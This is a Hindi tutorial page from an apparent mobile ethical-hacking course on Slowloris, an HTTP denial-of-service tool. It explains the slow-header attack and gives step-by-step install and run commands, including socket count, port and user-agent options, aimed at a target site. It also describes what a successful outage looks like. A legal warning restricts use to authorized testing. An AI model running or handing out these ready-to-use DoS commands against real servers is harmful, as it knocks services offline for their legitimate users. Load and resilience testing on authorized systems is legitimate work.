Termux Learn - Ethical Hacking in Hindi | Free Mobile Hacking Course

🕷️ Slowloris क्या है?

Slowloris एक HTTP DoS (Denial of Service) attack tool है जो web server को slow HTTP connections से बंद कर देता है। यह server की connections limit को भर देता है और legitimate users को access नहीं मिलता।

👉 Web server load testing और DoS defense testing में use होता है, लेकिन केवल authorized testing के लिए!

🔍 Slowloris क्या-क्या कर सकता है

HTTP Connections Flood

Slow HTTP connections से server बंद करना

Keep-Alive Abuse

HTTP keep-alive connections hold करना

Server Stress Testing

Web server की capacity test करना

DoS Defense Testing

Server की DoS resistance test करना

Apache/Nginx Vulnerability Test

HTTP server की Slowloris vulnerability check करना

🧠 Slowloris Attack कैसे काम करता है

Slow HTTP Connections Open करो

बहुत सारे slow HTTP connections भेजो जो बहुत धीरे से complete हों

Header भेजते रहो (बहुत धीरे से)

बार-बार incomplete headers भेजो ताकि connection alive रहे

Server Connections भर जाएँ

Server की connection limit भर जाए (default 256 or 1024)

Legitimate Users बाहर हो जाएँ

नए connections नहीं मिलते, legitimate users को error मिलता है

👉 यह attack में कम bandwidth use होती है लेकिन server को easily डाउन कर सकती है!

⚙️ Kali NetHunter / Termux में Slowloris install

gitInstallation Commands

Install Python & git

apt update && apt install python git -y

Clone Slowloris Repository

git clone https://github.com/gkbrk/slowloris.git

Go to directory

cd slowloris

Run Slowloris

python slowloris.py example.com

💻 Basic Commands (Use)

👉 Commands को एक-एक करके use कर सकते हो:

Basic Attack

python slowloris.py example.com

Custom Port (-p)

python slowloris.py example.com -p 8080

Connection Count (-s)

python slowloris.py example.com -s 500

User Agent (-ua)

python slowloris.py example.com -ua "Mozilla/5.0"

Stop with Ctrl+C

# Press Ctrl+C to stop attack

🌐 Real Example (Practical समझ)

Example🎯 Test Command

python slowloris.py example.com -s 500 -p 80

example.com

Target website

-s 500

500 connections

-p 80

Port 80

📊 Output समझो

जब attack चल रहा हो तो output कुछ ऐसा दिखेगा:

Starting attack on example.com...

Using 500 sockets...

Sending HTTP headers slowly...

Attack is running. Press Ctrl+C to stop.

🧠 अगर attack successful है:

Server Down

Website Not Responding

Legitimate users को error मिलेगा

Connection Error

Connection Refused / Timeout

Server busy है, नए connections नहीं मिल रहे

🎚️ Advanced Options

-s NUMBER

Number of sockets/connections (default: 500)

-p PORT

Target port (default: 80)

-ua STRING

Custom User-Agent header

--timeout

Connection timeout in seconds

⚠️ CRITICAL WARNING - DoS Attack Illegal है

Slowloris का illegal use सीरियस criminal offense है - जेल और fine हो सकती है!

केवल इन cases में use करो:

अपना own website (load testing)
Written permission के साथ client's website
Authorized penetration testing contracts
Educational labs / Isolated test environment

👉 किसी भी website को Slowloris attack करना cybercrime है → IT Act, CFAA और अन्य laws के तहत strict punishment

👉 अगर आप किसी website पर unauthorized Slowloris attack करते हैं:

• IP आपके ISP से trace हो जाएगा
• Cybercrime police action ले सकती है
• जेल (3-10 years) और heavy fine हो सकती है

🧩 Related Tools

hping3

Packet generator tool

Nmap

Port scanning tool

Hydra

Brute force attacks

💡 Simple समझ

Slowloris = "Server का Slow Death"

यह server को बहुत सारी slow connections से घेर लेता है, जैसे हजारों लोग बिना काम किए line में खड़े हो जाएँ। असली customers को entry नहीं मिलती!